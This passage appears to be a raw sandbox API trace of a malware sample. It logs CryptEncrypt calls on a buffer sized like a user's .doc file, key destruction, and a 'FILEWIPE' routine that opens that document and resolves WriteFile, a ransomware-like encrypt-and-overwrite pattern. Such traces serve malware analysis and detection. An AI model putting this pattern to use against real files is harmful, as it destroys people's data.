pdwDataLen=0x6ae220*=0x5070) returned 1 [0035.877] CharLowerBuffW (in: lpsz="byte[20593]", cchLength=0xb | out: lpsz="byte[20593]") returned 0xb [0035.878] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.878] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.878] CryptEncrypt (in: hKey=0x7c21c0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x964168*, pdwDataLen=0x6ae220*=0x5068, dwBufLen=0x5070 | out: pbData=0x964168*, pdwDataLen=0x6ae220*=0x5070) returned 1 [0035.878] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0035.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0035.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.878] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0035.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0035.878] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.878] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.881] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0035.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.881] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.881] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.881] CryptDestroyKey (hKey=0x7c21c0) returned 1 [0035.881] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0035.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17d8 | out: hHeap=0x770000) returned 1 [0035.881] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.882] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0035.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.882] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.882] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0035.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0035.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.882] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0035.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.882] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0035.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0035.882] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0035.882] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0035.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1bc0 | out: hHeap=0x770000) returned 1 [0035.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0035.882] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.882] CryptReleaseContext (hProv=0x7d5b30, dwFlags=0x0) returned 1 [0035.882] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0035.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0035.882] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0035.882] FreeLibrary (hLibModule=0x754b0000) returned 1 [0035.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0035.883] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0035.884] CharUpperBuffW (in: lpsz="FILEWIPE", cchLength=0x8 | out: lpsz="FILEWIPE") returned 0x8 [0035.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b17b0 | out: hHeap=0x770000) returned 1 [0035.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0035.884] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc", lpFindFileData=0x6ae7a0 | out: lpFindFileData=0x6ae7a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x697d97e0, ftCreationTime.dwHighDateTime=0x1d5b721, ftLastAccessTime.dwLowDateTime=0xa3192220, ftLastAccessTime.dwHighDateTime=0x1d5bf06, ftLastWriteTime.dwLowDateTime=0xa3192220, ftLastWriteTime.dwHighDateTime=0x1d5bf06, nFileSizeHigh=0x0, nFileSizeLow=0x5068, dwReserved0=0x0, dwReserved1=0x777648, cFileName="oY6qw7y-W3iuu.doc", cAlternateFileName="OY6QW7~1.DOC")) returned 0x7c2240 [0035.884] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0035.884] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0035.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0035.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a58 | out: hHeap=0x770000) returned 1 [0035.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0035.885] CharLowerBuffW (in: lpsz="byte[20584]", cchLength=0xb | out: lpsz="byte[20584]") returned 0xb [0035.885] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0035.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c880 | out: hHeap=0x770000) returned 1 [0035.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0035.885] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0035.885] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76b40000 [0035.885] FreeLibrary (hLibModule=0x76b40000) returned 1 [0035.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0035.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0035.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0035.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1710 | out: hHeap=0x770000) returned 1 [0035.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b16c0 | out: hHeap=0x770000) returned 1 [0035.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af538 | out: hHeap=0x770000) returned 1 [0035.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0035.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0035.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cf10 | out: hHeap=0x770000) returned 1 [0035.885] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce98 | out: hHeap=0x770000) returned 1 [0035.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0035.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9d0 | out: hHeap=0x770000) returned 1 [0035.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0035.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0035.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891d8 | out: hHeap=0x770000) returned 1 [0035.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899d0 | out: hHeap=0x770000) returned 1 [0035.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce80 | out: hHeap=0x770000) returned 1 [0035.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889430 | out: hHeap=0x770000) returned 1 [0035.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898c8 | out: hHeap=0x770000) returned 1 [0035.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb50 | out: hHeap=0x770000) returned 1 [0035.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0035.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0035.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c940 | out: hHeap=0x770000) returned 1 [0035.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0035.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0035.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c748 | out: hHeap=0x770000) returned 1 [0035.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0035.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0035.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da228 | out: hHeap=0x770000) returned 1 [0035.886] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0035.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b45c8 | out: hHeap=0x770000) returned 1 [0035.886] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0035.886] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0035.887] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.887] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\oY6qw7y-W3iuu.doc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\lkoiqe-amaiainsrd\\007meso66\\oy6qw7y-w3iuu.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x128 [0035.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da148 [0035.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x214) returned 0x7b8158 [0035.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0035.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0035.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0035.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0035.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0035.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0035.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0035.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0035.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0035.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0035.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0035.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0035.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0035.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xb0) returned 0x7c5758 [0035.887] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x93a078 | out: hHeap=0x770000) returned 1 [0035.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0035.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0035.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0035.887] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0035.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0035.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0035.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd18 | out: hHeap=0x770000) returned 1 [0035.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd18 [0035.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0035.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0035.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0035.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0035.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0035.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c958 | out: hHeap=0x770000) returned 1 [0035.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c958 [0035.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0035.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0035.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0035.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0035.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0035.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889ad8 | out: hHeap=0x770000) returned 1 [0035.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889ad8 [0035.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0035.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0035.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0035.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0035.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0035.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb80 | out: hHeap=0x770000) returned 1 [0035.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb80 [0035.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0035.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0035.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0035.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0035.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0035.888] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0035.888] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0035.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896b8 [0035.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0035.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2b8 [0035.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbf8 | out: hHeap=0x770000) returned 1 [0035.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0035.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896b8 | out: hHeap=0x770000) returned 1 [0035.889] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3f8 | out: hHeap=0x770000) returned 1 [0035.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da208 | out: hHeap=0x770000) returned 1 [0035.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2a8 | out: hHeap=0x770000) returned 1 [0035.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da348 | out: hHeap=0x770000) returned 1 [0035.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0035.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0035.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da188 | out: hHeap=0x770000) returned 1 [0035.889] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0035.889] CharUpperBuffW (in: lpsz="_WINAPI_WRITEFILE", cchLength=0x11 | out: lpsz="_WINAPI_WRITEFILE") returned 0x11 [0035.889] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0035.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da378 [0035.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1a8 [0035.889] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0035.889] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c808 [0035.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da188 [0035.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0035.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xa) returned 0x88cb08 [0035.890] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="WriteFile", cchWideChar=10, lpMultiByteStr=0x88cb08, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="WriteFile", lpUsedDefaultChar=0x0) returned 10 [0035.890] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.890] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0035.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0035.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da2d8 [0035.890] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0035.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0035.890] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da148 [0035.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da2d8 [0035.890] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0035.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0035.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x30) returned 0x7b45c8 [0035.890] CharUpperBuffW (in: lpsz="_WINAPI_CLOSEHANDLE", cchLength=0x13 | out: lpsz="_WINAPI_CLOSEHANDLE") returned 0x13 [0035.890] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1ad0 [0035.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0035.890] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0035.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdc0 [0035.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0035.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0035.891] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0035.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0035.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af538 [0035.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0035.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0035.891] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0035.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0035.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0035.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0035.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c9a0 [0035.891] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x88c9a0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0035.891] FreeLibrary (hLibModule=0x76e10000) returned 1 [0035.891] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0035.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b87d0 [0035.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0035.891] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0035.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0035.891] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0035.891] 